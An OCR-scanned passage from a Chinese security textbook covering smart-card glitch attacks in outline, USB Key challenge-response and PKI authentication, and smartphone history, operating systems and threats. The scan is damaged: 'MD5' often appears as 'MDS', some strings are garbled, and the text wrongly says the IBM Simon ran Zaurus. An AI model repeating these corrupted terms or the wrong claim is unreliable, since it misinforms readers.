突然 注入 高 频率 的 脉冲 ， 导 致 处 理 器 丢失 一 两 条 指令 。 

© 超 范围 电压 探测 : 与 超 范围 时 钟 频 率 探测 类 似 ， 通 过 调整 电压 ， 使 处 理 器 出 错 。 

针对 以 上 的 攻击 手段 ， 智 能 卡 厂商 都 采取 了 一 系列 防范 措施 : 如 总 线 分 层 、 使 芯片 
平坦 化 、 平 衡 能 耗 、 随 机 指令 元 余 等 。 


4.6.2 USB-Key 技术 


=i 


USB Key 是 一 种 USB 接口 的 硬件 设备 。 它 内 置 单片机 或 智能 卡 芯片 ， 有 一 定 的 存 
储 空间 , 可 以 存储 用 户 的 私 钥 以 及 数字 证 书 , 利用 USB Key 内 置 的 公 钥 算 法 实现 对 用 户 
身份 的 认证 。 由 于 用 户 私 钥 保存 在 密码 锁 中 ， 理 论 上 使 用 任何 方式 都 无 法 读 取 ， 因 此 保 
证 了 用 户 认 证 的 安全 性 。 

USB Key 产品 最 早 是 由 加 密 锁 厂 商 提出 来 的 ， 原 先 的 USB 加 密 锁 主要 用 于 防止 软 
件 破 解 和 复制 ， 保 护 软件 不 被 盗版 ， 而 USB Key 的 目的 不 同 ，USB Key 主要 用 于 网 络 认 
证 ， 锁 内 主要 保存 数字 证 书 和 用 户 私 钥 。 基 于 USB Key 的 身份 认证 方式 是 近 几 年 发 展 起 
来 的 一 种 方便 、 安 全 的 身份 认证 技术 。USB Key 结合 了 现代 密码 学 技术 、 智 能 卡 技 术 和 
USB 技术 ， 是 新 一 代 身 份 认 证 产品 。 它 采用 软 硬 件 相 结合 、 一 次 一 密 的 强 双 因子 认证 模 
式 ， 很 好 地 解决 了 安全 性 与 易 用 性 之 间 的 矛盾 。 
4.6.2.1 USB Key 身份 认证 原理 

每 个 USB Key 硬件 都 具有 用 户 PIN 码 ， 以 实现 双 因 子 认证 功能 。USB Key 内 置 单 
向 散 列 算法 (MD5)， 预 先 在 USB Key 和 服务 器 中 存储 一 个 证 明 用 户 身份 的 密 钥 ， 当 需 
要 在 网 络 上 验证 用 户 身 份 时 先 由 客户 端 向 服务 器 发 出 一 个 验证 请 求 。 服 务 器 接 到 此 请 求 
后 生成 一 个 随机 数 并 通过 网 络 传输 给 客户 端 ( 此 为 冲击 )。 客户 端 将 收 到 的 随机 数 提供 给 
插 在 客户 端 上 的 USB Key， 由 USB Key 使 用 该 随机 数 与 存储 在 USB Key 中 的 密 钥 进行 
带 密 钥 的 单 向 散 列 运算 (HMACMD5) 并 得 到 一 个 结果 作为 认证 证 据 传 送 给 服务 器 (此 
为 响应 )。 与 此 同时 ， 服 务 器 使 用 该 随机 数 与 存储 在 服务 器 数据 库 中 的 该 客户 密 钥 进 行 
HMAC-MDS 运算 ， 如 果 服 务 器 的 运算 结果 与 客户 端 传 回 的 响应 结果 相同 ， 则 认为 客户 
端 是 一 个 合法 用 户 ， 原 理 如 图 4-16 所 示 。 

图 中 “R” 代 表 服务 器 提供 的 随机 数 ,“Key” 代 表 密 钥 ,“X” 代 表 随 机 数 和 密 钥 经 
过 HMAC-MDS 运算 后 的 结果 。 通 过 网 络 传输 的 只 有 随机 数 “R” 和 运算 结果 “X” 用 
户 密 钥 “Key” 既 不 在 网 络 上 传输 也 不 在 客户 端 电脑 内 存 中 出 现 ， 网 络 上 的 黑客 和 客户 
端 电脑 中 的 木马 程序 都 无 法 得 到 用 户 的 密 钥 。 由 于 每 次 认证 过 程 使 用 的 随机 数 “R” 和 
运算 结果 “X” 都 不 一 样 ， 即 使 在 网 络 传输 的 过 程 中 认证 数据 被 黑客 截获 ， 也 无 法 逆 推 
获得 密 钥 。 这 就 从 根本 上 保证 了 用 户 身份 无 法 被 仿冒 。 
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图 4-16 USB Key 身份 认证 原理 


4.6.2.2 USB Key 身份 认证 的 特点 

1， 双 因子 认证 

每 一 个 USB Key 都 具有 硬件 PIN 码 保护 ，PIN 码 和 硬件 构成 了 用 户 使 用 USB Key 
的 两 个 必要 因素 ， 即 所 谓 “ 双 因子 认证 ”。 用 户 只 有 同时 取得 了 USB Key 和 用 户 PIN 码 ， 
才 可 以 登录 系统 。 即 使 用 户 的 PIN 码 被 泄漏 ， 只 要 用 户 持 有 的 USB Key 不 被 盗 取 , 合法 
用 户 的 身份 就 不 会 被 仿冒 ， 如果 用 户 的 USB Key 遗失 ， 拾 到 者 由 于 不 知道 用 户 PIN 码 ， 
也 无 法 仿冒 合法 用 户 的 身份 。 

2. 带 有 安全 存储 空间 

USB Key 具有 8K-128K 的 安全 数据 存储 空间 ,可 以 存储 数字 证 书 、 用 户 密 钥 等 秘密 
数据 ， 对 该 存储 空间 的 读 写 操作 必须 通过 程序 实现 ， 用 户 无 法 直接 读 取 ， 其 中 用 户 私 钥 
是 不 可 导出 的 ， 杜 绝 了 复制 用 户 数 字 证 书 或 身份 信息 的 可 能 性 。 

3. 硬件 实现 加 密 算法 

USB Key 内 置 CPU 或 智能 卡 芯片 ， 可 以 实现 PKI 体系 中 使 用 的 数据 摘要 、 数 据 加 
解密 和 签名 的 各 种 算法 ,加 解密 运算 在 USB Key 内 进行 , 保证 了 用 户 密 钥 不 会 出 现在 计 
算 机 内 存 中 , 从 而 杜绝 了 用 户 密 钥 被 黑客 截取 的 可 能 性 ,支持 RSA, DES, SSF33 和 3DES 
算法 。 

4. 便于 携带 ， 安 全 可 靠 

如 拇指 般 大 的 USB Key 非常 方便 随身 携带 ,并 且 密 钥 和 证 书 不 可 导出 ，Key 的 硬件 
不 可 复制 ， 更 显 安全 可 靠 。 

5. 身份 认证 模式 

USBkey 的 认证 模式 主要 有 2 种 : 基于 冲击 /响应 的 认证 模式 和 基于 PKI 体系 的 认证 
模式 。 

(1) 基于 冲击 -响应 的 双 因子 认证 方式 

当 需 要 在 网 络 上 验证 用 户 身 份 时 ， 先 由 客户 端 向 服务 器 发 出 一 个 验证 请 求 。 服 务 器 
接 到 此 请 求 后 生成 一 个 随机 数 并 通过 网 络 传输 给 客户 端 ( 此 为 冲击 )。 客户 端 将 收 到 的 随 
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机 数 通过 USB 接口 提供 给 ePass， 由 ePass 使 用 该 随机 数 与 存储 在 ePass 中 的 密 钥 进行 
MDS-HMAC 运算 并 得 到 一 个 结果 作为 认证 证 据 传 给 服务 器 (此 为 响应 )。 与 此 同时 ， 服 
务 器 也 使 用 该 随机 数 与 存储 在 服务 器 数据 库 中 的 该 客户 密 钥 进行 MD5-HMAC 运算 ， 如 
果 服 务 器 的 运算 结果 与 客户 端 传 回 的 响应 结果 相同 ， 则 认为 客户 端 是 一 个 合法 用 户 。 

密 钥 运算 分 别 在 ePass 硬件 和 服务 器 中 运行 ， 不 出 现在 客户 端 内 存 中 ， 也 不 在 网 络 
上 传输 ， 由 于 MDS-HMAC 算法 是 一 个 不 可 逆 的 算法 ， 就 是 说 知道 密 铀 和 运算 用 随机 数 
就 可 以 得 到 运算 结果 ， 而 知道 随机 数 和 运算 结果 却 无 法 计算 出 密 钥 ， 从 而 保护 了 密 钥 的 
安全 ， 也 就 保护 了 用 户 身份 的 安全 。 

(2) 基于 数字 证 书 的 认证 方式 

随 着 PKI 技术 日 趋 成 熟 ， 许 多 应 用 中 开始 使 用 数字 证 书 进行 身份 认证 与 数字 加 密 。 
数字 证 书 是 由 权威 公正 的 第 三 方 机 构 即 CA 中 心 签发 的 , 以 数字 证 书 为 核心 的 加 密 技 术 ， 
可 以 对 网 络 上 传输 的 信息 进行 加 密 和 人 解密、 数字 签名 和 签名 验证 ， 确 保 网 上 传递 信息 的 
机 密 性 、 完 整 性 ， 以 及 交易 实体 身份 的 真实 性 ， 签 名 信息 的 不 可 否认 性 ， 从 而 保障 网 络 
应 用 的 安全 性 。 

PKI 即 公共 密 钥 体系 ， 即 利用 一 对 互相 匹配 的 密 钥 进行 加 密 、 解 密 。 每 个 用 户 拥有 
一 个 仅 为 本 人 所 掌握 的 私有 密 钥 ( 私 钥 )， 用 它 进行 解密 和 签名 ; 同时 拥有 一 个 公开 密 钥 
( 公 钥 ) 用 于 文件 发 送 者 加 密 和 接收 者 验证 签名 。 当 发 送 一 份 保密 文件 时 ， 发送 方 使 用 接 
收 方 的 公 钥 对 数据 加 密 ， 而 接收 方 则 使 用 自己 的 私 钥 解 密 ， 这 样 ， 信 息 就 可 以 安全 无 误 
地 到 达 目 的 地 了 ， 即 使 被 第 三 方 截获 ， 由 于 没有 相应 的 私 钥 ， 也 无 法 进行 解密 。 

用 户 也 可 以 采用 自己 的 私 钥 对 信息 进行 加 密 ， 接 收 者 用 发 送 者 的 公 钥 解密 ， 由 于 私 
钥 仅 为 用 户 本 人 所 有 ， 所 以 就 能 够 确认 该 信息 确实 是 由 该 用 户 发 送 的 ， 此 过 程 称 之 为 数 
字 签 名 。 

USB Key 作为 数字 证 书 的 存储 介质 ， 可 以 保证 数字 证 书 不 被 复制 ， 并 可 以 实现 所 有 
数字 证 书 的 功能 。 
4.6.2.3 USBkey 的 安全 问题 

冲击 -响应 模式 可 以 保证 用 户 身 份 不 被 仿冒 , 却 无 法 保护 用 户 数据 在 网 络 传输 过 程 中 
的 安全 ,而 基于 PKI 构架 的 数字 证 书 认证 方式 可 以 有 效 保证 用 户 的 身份 安全 和 数据 安全 。 
数字 证 书 是 由 可 信任 的 第 三 方 认 证 机 构 颁 发 的 一 组 包含 用 户 身份 信息 〈 密 钥 ) 的 数据 结 
H, PKI 体系 通过 采用 加 密 算 法 构建 了 一 套 完 善 的 流程 ， 保 证 数字 证 书 持 有 人 的 身份 
安全 。 

然而 ， 数 字 证 书本 身 也 是 一 种 数字 身份 ， 还 是 存在 被 复制 的 危险 。 使 用 USB Key 
可 以 保障 数字 证 书 无 法 被 复制 ,所 有 密 钥 运算 由 USB Key 实现 , 用 户 密 钥 不 在 计算 机 内 
存 出 现 也 不 在 网 络 中 传播 只 有 USB Key 的 持 有 人 才能 够 对 数字 证 书 进行 操作 ， 安 全 性 
有 了 保障 。 

USB Key 目前 来 说 并 不 是 绝对 安全 的 ， 当 前 广泛 应 用 的 USB Key 实际 存在 两 大 安 
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全 漏洞 : 

O 交互 操作 存在 漏洞 。 黑 客 可 以 远程 控制 ， 冒 用 客户 的 USB Key 进行 身份 认证 ， 
而 客户 无 法 知晓 。 

© 无 法 防止 数据 被 算 改 。 客 户 的 一 笔 交易 在 送 入 USB Key 加 密 前 ， 可 能 会 被 黑客 
拦截 屏 算 改 为 男 外 一 笔 交 易 ， 这 样 可 以 在 用 户 不 知情 的 情况 下 自 改 交易 而 认证 通过 。 

解决 这 些 漏洞 的 方法 是 通过 在 USB 设备 上 增加 新 的 硬件 , 革新 认证 策略 。 目前 这 些 
方法 都 在 研究 当中 。 

由 于 USB Key 具有 安全 可 靠 ， 便 于 携带 、 使 用 方便 、 成 本 低廉 的 优点 ， 加 上 PKI 
体系 完善 的 数据 保护 机 制 , 使 用 USB Key 存储 数字 证 书 的 认证 方式 已 经 成 为 目前 主要 的 
认证 模式 。 未 来 ， 身 份 认证 技术 将 朝 着 更 加 安全 、 易 用 、 多 种 技术 手段 相 结 合 的 方向 发 
展 。USBKey 将 会 成 为 身份 认证 的 主要 发 展 方向 ，USB Key 的 运算 能 力 和 易 用 性 也 将 不 
断 提 高 。 随 着 指纹 识别 技术 的 不 断 成 熟 和 成 本 降低 ，USB Key 将 会 使 用 指纹 识别 技术 以 
保证 硬件 本 身 的 安全 性 。 


4.6.3 智能 终端 


智能 手机 ， 是 指 像 个 人 电脑 一 样 ， 具 有 独立 的 操作 系统 ， 独 立 的 运行 空间 ， 可 以 由 
用 户 自行 安装 软件 、 游 戏 、 导 航 等 第 三 方 服 务 商 提供 的 程序 ， 并 可 以 通过 移动 通信 网 络 
来 实现 无 线 网 络 接 入 手机 类 型 的 总 称 。 智 能 手机 的 使 用 范围 已 经 布 满 全 世界 ， 基 本 替代 
了 键盘 式 手机 。 

智能 手机 的 诞生 ， 是 PDA 演变 而 来 的 。PDA， 英 文 全 称 Personal Digital Assistant, 
即 个 人 数码 助理 ， 一 般 是 指 掌 上 电脑 。 相 对 于 传统 电脑 ，PDA 的 优点 是 轻便 、 小 巧 、 可 
移动 性 强 ， 同 时 又 不 失 功 能 的 强大 ， 缺 点 是 屏幕 过 小 ， 且 电池 续航 能 力 有 限 。PDA 通常 
采用 手写 笔 作为 输入 设备 ， 而 存储 卡 作为 外 部 存储 介质 。 在 无 线 传输 方面 ， 大 多 数 PDA 
有 具 有 红外 和 蓝牙 接口 ， 以 保证 无 线 传输 的 便利 性 。 许多 PDA 还 能 够 具备 Wi-Fi 连接 以 及 
GPS 全 球 卫 星 定位 系统 。 

PDA 的 主要 功能 是 进行 便携 的 数字 化 处 理 ， 如 文字 处 理 、 日 程 安排 、 上 网 、GPS、 
无 线 通信 等 等 。 近 年 ，PDA 与 手机 通信 功能 进行 融合 ， 出 现 了 智能 手机 的 概念 和 产品 。 
目前 应 用 场景 越 来 越 多 。 

美军 已 经 在 伊拉克 战争 中 使 用 了 CDA (Commander Digital Assistant )， 这 就 是 一 种 
具有 定位 、 通 信 等 功能 的 嵌入 式 系统 PDA， 目 前 马上 要 装备 到 连 级 指挥 官 。 利 用 这 种 设 
备 ， 军 队 指 挥 员 和 战斗 员 可 以 进行 实时 的 联络 ， 战 斗 小 队 可 以 完成 对 于 战斗 地 区 各 种 信 
息 的 查询 和 战斗 情况 的 汇报 ， 并 且 可 以 利用 通信 系统 获取 指挥 机 关 的 各 种 指令 和 信息 ， 
计算 导弹 及 炮火 单元 ， 以 获得 足够 的 火力 支持 ， 甚 至 可 以 实时 获取 侦察 卫星 和 飞机 等 提 
供 的 最 新 战场 地 图 等 等 。 
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第 一 款 PDA 是 1992 年 由 苹果 电脑 出 品 的 Newton。 但 这 一 款 产 品 在 商业 上 很 不 成 功 。 
后 来 出 现 了 专门 为 了 手写 输入 的 Graffiti 输入 法 ， 一 家 利用 此 方法 作为 输入 法 的 PDA 公 
司 推出 了 Palm 这 一 个 系列 的 产品 ， 并 获得 了 巨大 的 成 功 。 在 20 世纪 末 ， 微 软 进入 这 一 
个 领域 , 并 首先 推出 了 Windows CE 1.0 操作 系统 , 但 该 系统 在 各 方面 表现 并 不 尽 如 人 意 ， 
但 后 来 微软 推出 的 Windows Pocket Edition 2002 —2$ 2452 T PPC 操作 系统 领先 的 地 位 。 
目前 最 受 欢迎 的 掌上 电脑 操作 系统 平台 分 别 有 Linux 及 微软 Windows CE 系列 。 

PDA 具备 了 一 台电 脑 主 机 的 基本 结构 ，PDA 主要 由 微 控制 器 、 存 储 器 、L/O 设备 、 
LCD 和 触摸 屏 及 其 驱动 、 电 源 、Barcode 扫描 仪 、USB 等 组 成 。 目 前 所 谓 PDA 设备 本 
质 上 就 是 一 个 典型 的 嵌入 式 系统 。 典 入 式 系统 有 别 于 通用 的 PC， 嵌入 式 的 CPU 就 是 一 
个 小 型 的 计算 机 系统 ，IO、 存 储 器 、 甚 至 部 分 的 模拟 电路 都 已 集成 在 内 。 和 嵌入 式 CPU 
系统 的 体系 结构 目前 采取 的 比较 多 的 是 哈弗 结构 ， 即 数据 存储 器 和 程序 存储 器 分 开 的 
结构 。 

最 早 的 掌上 电脑 并 不 具备 手机 通话 功能 ， 但 是 随 着 用 户 对 于 掌上 电脑 的 个 人 信息 处 
理 方面 功能 的 依赖 的 提升 ， 又 不 习惯 于 随时 都 携带 手机 和 PDA 两 个 设备 ， 所 以 厂商 将 
掌上 电脑 的 系统 移植 到 了 手机 中 ， 于 是 才 出 现 了 智能 手机 这 个 概念 。 智 能 手机 比 传统 的 
手机 具有 更 多 的 综合 性 处 理 能 力 功能 ， 比 如 Symbian 操作 系统 的 S60 系列 ，Symbian3， 
以 及 一 些 MeeGo 操作 系统 的 智能 手机 。 

智能 手机 同 传统 手机 外 观 和 操作 方式 类 似 ， 不 仅 包含 触摸 屏 也 包含 非 触摸 屏 数字 键 
盘 手 机 和 全 尺寸 键盘 操作 的 手机 。 但 是 传统 手机 都 使 用 的 是 生产 厂商 自行 开发 的 封闭 式 
操作 系统 ， 所 能 实现 的 功能 非常 有 限 ， 不 具备 智能 手机 的 扩展 性 。 智 能 手机 这 个 说 法 主 
要 是 针对 功能 手机 (Feature phone) 而 来 的 , 本 身 并 不 意味 着 这 个 手机 有 多 智能 (Smart); 
从 另 一 个 角度 来 讲 ， 所 谓 的 “智能 手机 ”就 是 一 台 可 以 随意 安装 和 务 载 应 用 软件 的 手机 
(就 像 电 脑 那 样 )。 功 能 手机 是 不 能 随意 安装 秃 载 软件 的 ，Java 的 出 现 使 后 来 的 功能 手机 
具备 了 安装 Java 应 用 程序 的 功能 ， 但 是 Java 程序 的 操作 友好 性 ， 运 行 效率 及 对 系统 资 
源 的 操作 都 比 智能 手机 差 很 多 。 

世界 上 第 一 款 智能 手机 是 IBM 公司 1993 年 推出 的 Simon， 它 也 是 世界 上 第 一 款 使 
用 触摸 屏 的 智能 手机 , 使 用 Zaurus 操作 系统 ， 只 有 一 款 名 为 DispatchIt 第 三 方 应 用 软件 。 
它 为 以 后 的 智能 手机 处 理 器 莫 定 了 基础 ， 有 着 里 程 碑 的 意义 。 

第 一 代 iPhone 于 2007 年 发 布 , 2008 年 7 月 11 日 ,苹果 公司 推出 iPhone 3G。 自 此 ， 
智能 手机 的 发 展开 启 了 新 的 时 代 ，iPhone 成 为 了 引领 业界 的 标杆 产品 。 

大 屏幕 平板 手机 (Phablet) 逐渐 成 为 主流 ， 到 了 2014 年 出 货 量 甚至 超越 小 型 平板 
电脑 。 据 《2013-2017 年 中 国 智能 手机 行业 市 场 需求 预测 与 投资 战略 规划 分 析 报 告 》 估 
算 ，2012 前 三 季度 ， 全 球 智 能 手机 用 户 总 数 已 经 突破 了 10 亿 大 关 。 而 2011 前 三 季度 的 
用 户 量 只 有 约 7 亿 。 可 以 看 出 ， 智 能 手机 市 场 的 潜力 不 可 估量 。 
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4.6.3.1 智能 终端 硬件 的 基本 特点 

智能 手机 系统 通常 是 面向 特定 应 用 的 嵌入 式 CPU ， 工 作 在 为 特定 用 户 群 设计 的 系 
统 中 ， 具 有 低 功 耗 、 体 积 小 、 集 成 度 高 等 特点 ， 能 够 把 通用 CPU 中 许多 由 板 卡 完成 的 
任务 集成 在 芯片 内 部 。 为 提高 执行 速度 和 系统 可 靠 性 ， 嵌 入 式 系统 中 的 软件 一 般 都 固化 
在 存储 器 芯片 或 单片机 本 身 中 ， 设 计 趋 于 小 型 化 ， 移 动能 力 大 大 增强 ， 和 网 络 的 耦合 

智能 手机 系统 是 将 先进 的 计算 机 技术 、 半 导体 技术 和 电子 技术 与 各 个 行业 的 具体 应 
用 相 结合 后 的 产物 。 
4.6.3.2 ”智能 终端 的 软件 系统 

智能 手机 和 欲 正常 工作 离 不 开 软 件 的 支持 ， 智 能 手机 的 软件 操作 系统 有 : Windows CE, 
Palm OS, Pocket PC, WindowsPhone 和 iOS， 安 卓 等 。 

1. Windows CE 

Microsoft 开发 的 嵌入 式 操 作 系统 ,是 专门 为 资源 有 限 的 硬件 而 设计 的 多 线程 、 多 任 
务 、 完 全 抢占 式 的 操作 系统 环境 。 它 内 建 了 Microsoft Pocket Outlook 所 具备 的 日 程 表 、 
联络 人 数据 、 工 作 清单 、 电 子 邮件 收 件 夹 等 四 大 功能 ， 并 可 随时 以 袖珍 浏览 器 邀 游 网 
络 、 企 业 网 络 ， 让 使 用 者 可 以 随时 掌握 个 人 所 需 的 最 新 信息 。 此 外 ， 使 用 者 还 可 以 利用 
手写 、 绘 图 或 屏幕 键盘 输入 等 方式 ， 达 到 既 快速 又 正确 的 信息 输入 方式 。CE 还 提供 独 
特 的 Microsoft Active Syne 主动 式 动态 同步 技术 ， 将 智能 手机 连接 到 PC 机 或 手提 电脑 ， 
甚至 通过 调制 解 调 器 或 网 络 ，Active Sync 都 会 持续 自动 地 更 新 使 用 者 的 联络 人 数据 、 日 
程 表 、 工 作 清单 、 电 子 邮件 及 其 附件 、 便 签 等 项 目的 信息 ， 与 智能 手机 的 Microsoft 
Outlook 或 是 Microsoft Schedule 同时 进行 处 理 ， 使 用 者 也 可 将 数据 与 其 他 通用 的 个 人 信 
息 管理 应 用 程序 (PIM) 进行 同步 作业 ， 此 外 ，Windows CE 中 文智 能 手机 还 具备 行动 频 
道 功能 ， 它 让 使 用 者 可 以 离线 查看 已 从 网 际 网 络 或 企业 内 部 网 络 上 所 选取 的 内 容 ， 而 远 
程 网 络 存 取 方面 的 行动 功能 ， 则 可 以 让 使 用 者 通过 串口 、 红 外 线 ， 或 是 调制 解 调 器 的 连 
接 ， 而 与 网 络 连接 ， 进 而 跟 其 他 PC 机 兼容 装置 共享 资源 。Windows CE 中 文智 能 手机 内 
建 许多 程序 ， 其 中 包括 : 录音 机 、 袖 珍 浏览 器 、 拨 号 网 络 、 全 球 时 钟 、 含 约 6 万 字 英 文 
词汇 的 字典 、 计 算 器 以 及 游戏 等 。 

2. Palm OS 

Palm 公司 开发 的 32 位 嵌入 式 操作 系统 ， 它 运行 在 一 个 抢占 式 的 多 任务 内 核 之 上 ， 
同一 时 刻 界 面具 允许 一 个 应 用 程序 被 打开 ，Palm OS 与 同步 软件 Hot Sync 结合 可 以 使 智 
能 手机 与 PC 机 上 的 信息 实现 同步 。 

3. Pocket PC 

在 Windows CE 的 基础 上 改进 的 。 它 解决 了 Windows CE 与 Palm OS 各 副本 操作 系 
统 不 兼容 的 问题 。Pocket PC 中 附带 有 很 多 应 用 软件 ， 包 括 : 通讯 德 、 日 历 、 记 事 本 、 
Pocket word, Pocket Excel, Pocket Internet Explore, Windows Media Player for Pocket 
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PC、Microsoft Reader。 

4. WindowsPhone 

Windows Phone (简称 为 WP) 是 微软 于 2010 年 10 H 21 日 正式 发 布 的 一 款 手机 操 
作 系 统 ， 初 始 版 本 命名 为 Windows Phone 7.0。 基 于 Windows CE 内 核 ， 采 用 了 一 种 称 为 
Metro 的 用 户 界 面 CUI)， 并 将 微软 旗下 的 Xbox Live 游戏 、Xbox Music 音乐 与 独特 的 视 
频 体验 集成 至 手机 中 。Windows Phone 8 舍弃 了 老 旧 Windows CE 内 核 , 采 用 了 与 Windows 
系统 相同 的 Windows NT 内 核 ,支持 很 多 新 的 特性 。 Windows Phone 的 后 续 是 Windows 10 
mobile. 

WindowsPhone 是 源码 封闭 的 ， 目 前 支持 包括 ARM 指令 集 等 一 系列 的 产品 。 可 以 直 
接 支持 Windows 环境 下 的 各 类 程序 ， 如 Word 文档 等 。 

S， 安 卓 

Android 是 一 种 以 Linux 为 基础 的 开放 源 代 码 操作 系统 ， 主 要 使 用 于 便携 设备 。 目 
前 尚未 有 统一 中 文 名 称 ， 中 国 大 陆地 区 较 多 人 使 用 “ 安 卓 ”或 “ 安 致 ”术语 。Android 
操作 系统 最 初 由 Andy Rubin 开发 ， 最 初 主要 支持 手机 。2005 年 由 Google 收购 注资 ， 并 
组 建 开放 手机 联盟 开发 改良 ， 逐 渐 扩展 到 平板 电脑 及 其 他 领域 上 。Android 的 主要 竞争 
对 手 是 苹果 公司 的 ioS 以 及 RIM 的 Blackberry OS. 2011 年 第 一 季度 ，Android 在 全 球 的 
市 场 份额 首次 超过 塞 班 系统 ， 跃 居 全 球 第 一 。2012 年 2 ABH, Android 占据 全 球 智能 
手机 操作 系统 市 场 59% 的 份额 ， 中 国 市 场 占 有 率 为 68.4%。 

Android 的 系统 架构 和 其 他 操作 系统 一 样 , 采用 了 分 层 的 架构 。 Android 分 为 4 个 层 ， 
从 高 层 到 低层 分 别 是 应 用 程序 层 、 应 用 程序 框架 层 、 系 统 运 行 库 层 和 Linux 核心 层 。 
Android 是 以 Linux 为 核心 的 手机 操作 平台 ， 作 为 一 款 开 放 式 的 操作 系统 ， 随 着 Android 
的 快速 发 展 ， 如 今 已 允许 开发 者 使 用 多 种 编程 语言 来 开发 Android 应 用 程序 ， 而 不 再 是 
以 前 只 能 使 用 Java 开发 Android 应 用 程序 的 单一 局 面 ， 因 而 受到 众多 开发 者 的 欢迎 ， 成 
为 真正 意义 上 的 开放 式 操作 系统 。 在 Android 中 ， 开 发 者 可 以 使 用 Java 作为 编程 语言 来 
开发 应 用 程序 ， 也 可 以 通过 NDK 使 用 C/C++ 作为 编程 语言 来 开发 应 用 程序 ， 也 可 使 用 
SL4A 来 使 用 其 他 各 种 脚本 语言 进行 编程 (如 : python, lua, tcl, php 等 )， 还 有 其 他 诸 
如 : Qt( qt for android), Mono (mono for android ) 等 一 些 著 名 编程 框架 也 开始 支持 Android 
编程 , 甚至 通过 MonoDroid, 开发 者 还 可 以 使 用 C# 作 为 编程 语言 来 开发 应 用 程序 。 另 外， 
谷歌 还 在 2009 年 特别 发 布 了 针对 初学 者 的 Android Simple 语言 , 该 语言 类 似 Basic 语言 。 
而 在 网 页 编程 语言 方面 , JavaScript, ajax, HTMLS, jquery、sencha、dojo、mobl、PhoneGap 
等 都 已 经 支持 Android 开发 。 而 在 Android 系统 底层 方面 ，Android 使 用 C/C++ 作为 开发 
语言 。 

6. iOS 

iOS 是 由 苹果 公司 开发 的 移动 操作 系统 。 苹 果 公 司 最 早 于 2007 年 1 月 9 日 的 
Macworld 大 会 上 公布 这 个 系统 ， 最 初 是 设计 给 iPhone 使 用 的 ， 后 来 陆续 套用 到 iPod 
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touch, iPad 以 及 Apple TV 等 产品 上 。iOS 与 苹果 的 Mac OS X 操作 系统 一 样 ， 属 于 类 
Unix 的 商业 操作 系统 。 原 本 这 个 系统 名 为 iPhone OS, KX iPad, iPhone, iPod touch 都 
使 用 iPhone OS， 所 以 2010WWDC 大 会 上 宣布 改名 为 iOS GOS 为 美国 Cisco 公司 网 络 
设备 操作 系统 注册 商标 ， 苹 果 改 名 已 获得 Cisco 公司 授权 )。 

它 管理 设备 硬件 并 为 手机 本 地 应 用 程序 的 实现 提供 基础 技术 。 根 据 设备 不 同 ， 操 作 
系统 具有 不 同 的 系统 应 用 程序 ， 例 如 Phone、Mail 以 及 Safari， 这 些 应 用 程序 可 以 为 用 
户 提供 标准 系统 服务 。 

iPhone SDK 包含 开发 、 安 装 及 运行 本 地 应 用 程序 所 需 的 工具 和 接口 。 本 地 应 用 程序 
使 用 iOS 系统 框架 和 Objective-C 语言 进行 构建 ， 并 且 直 接 运行 于 iOS 设备 。 它 与 Web 
应 用 程序 不 同 ， 一 是 它 位 于 所 安装 的 设备 上 ， 二 是 不 管 是 否 有 网 络 连 接 它 都 能 运行 。 可 
以 说 本 地 应 用 程序 和 其 他 系统 应 用 程序 具有 相同 地 位 。 本 地 应 用 程序 和 用 户 数 据 都 可 以 
通过 iTunes 同步 到 用 户 计算 机 。 

iOS 也 是 闭 源 的 操作 系统 ， 所 有 的 开发 软件 必须 经 过 苹果 的 审核 才能 开放 使 用 ， 并 
旦 只 能 在 苹果 的 硬件 设备 上 使 用 。 
4.6.3.3 ”智能 终端 的 发 展 前 景 

目前 ， 智 能 手机 设备 的 数量 已 经 超过 了 传统 的 PC， 智 能 手机 的 制作 越 来 越 精巧 ， 
性 价 比 越 来 越 高 。 高 档次 智能 手机 功能 越 来 越 强 大 ， 具 有 高 速 音 视频 处 理 、Java 等 各 种 
能 力 。 同 时 ， 高 、 中 、 低 档 智能 手机 同步 发 展 ， 以 满足 不 同 档次 用 户 的 需求 。 目 前 的 应 
用 场景 已 经 越 来 越 广阔 ， 在 一 定 的 程度 上 有 替代 低 端 的 PC 的 发 展 形势 。 

4634 智能 终端 面临 的 安全 问题 

长 期 以 来 ， 很 多 人 认为 智能 手机 软件 系统 是 固化 于 ROM 中 的 ， 不 存在 类 似 于 被 算 
改 和 攻击 的 可 能 性 , 因此 对 于 智能 手机 系统 的 安全 问题 , 业界 并 没有 过 多 的 研究 和 讨论 。 
随 着 智能 手机 的 普及 ， 越 来 越 多 功能 正 由 台式 电脑 向 智能 手机 转移 。 经 常用 智能 手机 看 
新 闻 、 访 问 社交 网 络 、 浏 览 视 频 网 站 、 手 机 支付 等 ， 就 会 留 下 一 些 相关 信息 ， 不 小 心 就 
会 泄露 。 其 中 恶意 软件 、 垃 圾 信息 、 隐 私 泄露 、 恶 意 扣 费 等 手机 安全 问题 是 多 数 用 户 所 
困 恼 的 。 智 能 手机 安全 隐患 有 如 下 的 几 个 方面 : 

O 目前 我 国 软件 应 用 平台 以 谷歌 的 Android 为 主 , 占据 国内 全 部 移动 应 用 的 86.4%, 
不 法 厂商 借助 其 开源 性 和 开放 性 的 特点 ,通过 伪装 算 改 热门 游戏 /软件 嵌入 木马 、 在 游戏 
/软件 中 捆绑 恶意 广告 插件 使 不 少 手机 用 户 落 入 吸 费 、 隐 私 窃取 、 流 谍 推 广 陷阱 之 中 。 

© 黑客 们 就 电 商 APP 进行 二 次 打包 ， 伪 装 知名 应 用 混淆 用 户 ， 还 企图 通过 输入 法 
窃取 用 户 的 淘宝 或 支付 宝 账号 密码 ， 从 而 窃取 用 户 的 财产 。 

@ 手机 病毒 感染 率 非常 严峻 。 导 致 此 现象 重要 原因 在 于 手机 用 户 刷 机 或 越狱 情况 
较为 普遍 。 

@ 短信 信息 常 含有 一 些 恶意 软 件 、 网 站 的 链接 ， 扫 描 二 维 码 染 毒 的 风险 日 益 增多 。 

智能 手机 也 运行 操作 系统 ， 拥 有 自己 的 应 用 软件 ， 具 有 完整 的 网 络 环境 ， 因 此 ， 智 
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手机 所 面临 的 安全 问题 ， 和 PC 是 一 致 的 。 同 时 ， 由 于 智能 手机 使 用 的 广泛 性 远大 于 
PC， 所 以 其 带 来 的 安全 隐患 更 应 该 引起 我 们 的 重视 。 
4.6.3.5 ”安全 问题 的 解决 方法 

解决 智能 手机 安全 问题 的 方法 与 PC 是 一 致 的 ， 分 为 基于 体系 结构 的 方法 和 基于 应 
